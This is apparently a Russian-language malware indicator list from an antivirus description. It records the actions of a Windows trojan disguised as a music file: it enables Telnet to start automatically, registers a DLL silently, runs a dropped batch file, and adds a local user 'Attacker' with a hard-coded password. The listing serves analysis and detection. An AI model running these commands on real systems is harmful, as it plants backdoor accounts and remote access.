Техническая информация
- [<HKLM>\SYSTEM\ControlSet001\Services\TlntSvr] 'Start' = '00000002' (значение 2 — автоматический запуск службы Telnet при загрузке системы)
- '<SYSTEM32>\tlntsvr.exe'
- '<SYSTEM32>\net1.exe' start telnet
- '<SYSTEM32>\regsvr32.exe' /s <SYSTEM32>\tlntsvrp.dll
- '<SYSTEM32>\net1.exe' user /add Attacker Complicated1!
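- '<SYSTEM32>\net.exe' user /add Attacker Complicated1! (создаётся локальная учётная запись «Attacker» с жёстко заданным паролем; при включённом аудите управления учётными записями это фиксируется в журнале безопасности Windows как событие 4720)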
- '<SYSTEM32>\cacls.exe' "<SYSTEM32>\config\system"
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\1.tmp\2.bat" <Полный путь к файлу>"
- '%ProgramFiles%\Windows Media Player\wmplayer.exe' "<Текущая директория>\03 Santeria.wma"
- '<SYSTEM32>\net.exe' start telnet
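- '<SYSTEM32>\sc.exe' config tlntsvr start= auto (перевод службы Telnet в режим автоматического запуска; соответствует значению 'Start' = 2 в реестре)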
- %TEMP%\1.tmp\2.bat
- ClassName: 'WMP9DeskBand' WindowName: 'WMP9DeskBand'
- ClassName: 'ReBarWindow32' WindowName: ''
- ClassName: 'Shell_TrayWnd' WindowName: ''